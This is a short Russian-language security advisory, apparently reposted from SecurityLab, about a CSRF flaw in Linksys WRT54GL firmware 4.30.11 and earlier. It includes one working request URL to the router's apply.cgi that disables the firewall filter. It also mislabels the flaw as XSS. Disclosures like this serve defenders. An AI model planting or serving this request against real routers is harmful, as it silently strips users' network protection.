×
Providers
Equipment
News
Photo
Companies
Forums
Practice
Theory
Ferrum
Share
Anonymous msg.
Add photo
Add news
Add Ferrum
Linksys WRT54GL
CSRF атака в Linksys WRT54GL
CSRF атака в Linksys WRT54GL
<P>Программа: Linksys WRT54GL 4.30.11 и более ранние версии </P>
<P>Опасность: Низкая </P>
<P>Наличие эксплоита: Да </P>
<P>Описание: <BR>Уязвимость позволяет удаленному пользователю произвести XSS нападение.</P>
<P>Уязвимость существует из-за недостаточной проверки подлинности HTTP запросов перед выполнением некоторых действий. Злоумышленник может обманом заставить авторизованного на устройстве пользователя посетить злонамеренный сайт и отключить функционал межсетевого экрана. Пример:</P>
<P><A href="
https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1&_block_multicast=0&_ident_pass=1">https://192.168.1.1/apply.cgi?submit_button=Firewall&change_action=&action=Apply&block_wan=1&block_loopback=0&multicast_pass=0&ident_pass=0&block_cookie=0&block_java=0&block_proxy=0&block_activex=0&filter=off&_block_wan=1&_block_multicast=0&_ident_pass=1</A></P>
<P><A class="" href="
http://www.securitylab.ru/vulnerability/311762.php"
target=_blank>SecurityLab</A></P>
You should to log in
Email
Password
Remember me
Enter
‹
›
×
You should to log in